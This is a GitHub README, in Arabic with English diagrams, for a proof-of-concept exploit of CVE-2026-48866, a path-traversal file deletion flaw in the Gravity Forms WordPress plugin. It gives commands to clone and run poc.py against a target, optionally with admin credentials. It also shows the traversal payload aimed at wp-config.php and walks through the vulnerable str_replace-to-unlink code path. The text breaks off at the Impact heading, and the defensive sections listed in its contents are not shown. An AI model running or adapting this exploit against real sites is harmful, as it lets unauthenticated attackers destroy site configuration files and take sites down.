
CVE-2026-48866 — Gravity Forms <= 2.10.0.1 حذف ملف تعسفي عبر اجتياز المسار (CVSS 9.6)
---``` ┌───────────────────────────────────────────────────────────┐ │ │ │ C V E - 2 0 2 6 - 4 8 8 6 6 │ │ │ │ Gravity Forms Path Traversal → Arbitrary File Deletion │ │ │ └───────────────────────────────────────────────────────────┘
<h3 align="center">
<code>gform_uploaded_files</code> يقبل استخدام <code>../</code> في العناوين URL. يؤدي النقر على زر الحذف من قبل المسؤول إلى حذف ملفات عشوائي.
</h3>
<p align="center">
<a href="https://nvd.nist.gov/vuln/detail/CVE-2026-48866">NVD</a> •
<a href="https://patchstack.com/database/wordpress/plugin/gravityforms/vulnerability/wordpress-gravity-forms-plugin-2-10-0-1-arbitrary-file-deletion-vulnerability">باتشستاك</a> •
<a href="https://github.com/codewurker/gravityforms/commit/cf2ff65133d581cfed1c308adc1621c3af1f8422">الالتزام المُصحَّح</a> •
<a href="https://github.com/codewurker/gravityforms">مرآة المصدر</a>
</p>
---
## جدول المحتويات
<table>
<tr>
<td width="50%">
**استغلال**
- [البداية السريعة](#quick-start)
- [كيف يعمل](#how-it-works)
- [التأثير](#impact)
- [الاستخدام](#usage)
</td>
<td width="50%">
**دفاع**
- [الغوص الفني](#technical-deep-dive)
- [الكشف](#detection)
- [المعالجة](#remediation)
- [المراجع](#references)
</td>
</tr>
</table>
---
## البداية السريعة```
┌─────────────────────────────────────────────────────────────────────┐
│ REQUIREMENTS │
│ ─────────────────────────────────────────────────────────────── │
│ Target WordPress + Gravity Forms ≤ 2.10.0.1 │
│ Form Public form with a file upload field │
│ Python 3.8+ with requests │
│ Auth None (injection) / Admin creds (trigger) │
└─────────────────────────────────────────────────────────────────────┘
يرجى تزويدي بنص الماركداون المراد ترجمته.```bash git clone https://github.com/0xABCD01/CVE-2026-48866.git cd CVE-2026-48866 pip install requests
python3 poc.py -t https://test.com -f 1 -i 3
python3 poc.py -t https://test.com -f 1 -i 3 --trigger --admin-user admin --admin-pass 'P@ssw0rd'
---
## كيف يعمل
### تدفق الهجوم```
┌───────────────────────────────────────────────────────────────────────┐
│ PHASE 1 — INJECTION │
│ (Unauthenticated — any visitor) │
├───────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────┐ POST gform_uploaded_files ┌──────────────────┐ │
│ │ Attacker │ ──────────────────────────────── │ WordPress AJAX │ │
│ └─────────┘ {"input_3": [{"url": │ admin-ajax.php │ │
│ ".../../../../wp-config.php"}] └────────┬─────────┘ │
│ │ │
│ esc_url_raw() → OK (doesn't strip ../) │ │
│ is_valid_url() → OK (../ is valid URL) │ │
│ ▼ │
│ ┌──────────────────┐ │
│ │ wp_postmeta │ │
│ │ (entry stored │ │
│ │ WITH ../) │ │
│ └────────┬─────────┘ │
└──────────────────────────────────────────────────────────┼────────────┘
│
┌─────────────────────────────┘
│ (hours, days, or weeks pass...)
▼
┌───────────────────────────────────────────────────────────────────────┐
│ PHASE 2 — DELETION │
│ (Admin deletes entry — routine cleanup) │
├───────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────┐ delete_entry(42) ┌──────────────────┐ │
│ │ Admin │ ──────────────────────────────── │ Gravity Forms │ │
│ └─────────┘ └────────┬─────────┘ │
│ │ │
│ get_physical_file_path() │ │
│ str_replace(url_base → path_base) │ │
│ ../ SURVIVES in the path │ │
│ ▼ │
│ ┌──────────────────┐ │
│ │ unlink() │ │
│ │ │ │
│ │ /var/www/html/ │ │
│ │ wp-config.php │ │
│ │ → DELETED │ │
│ └──────────────────┘ │
└───────────────────────────────────────────────────────────────────────┘
// forms_model.php — get_physical_file_path() // Converts stored URL to filesystem path via string replacement $path_info = GF_Field_FileUpload::get_file_upload_path_info( $url, $entry_id ); $file_path = str_replace( trailingslashit( $path_info['url'] ), // https://target.com/wp-content/uploads/gravity_forms/ trailingslashit( $path_info['path'] ), // /var/www/html/wp-content/uploads/gravity_forms/ $url // .../gravity_forms/../../../wp-config.php ); // Result: /var/www/html/wp-content/uploads/gravity_forms/../../../wp-config.php // OS resolves ../../../ → /var/www/html/wp-config.php
لا يوجد فحص بين `str_replace()` و `unlink()`. الخلل يكمن في تلك الفجوة.
---
## التأثير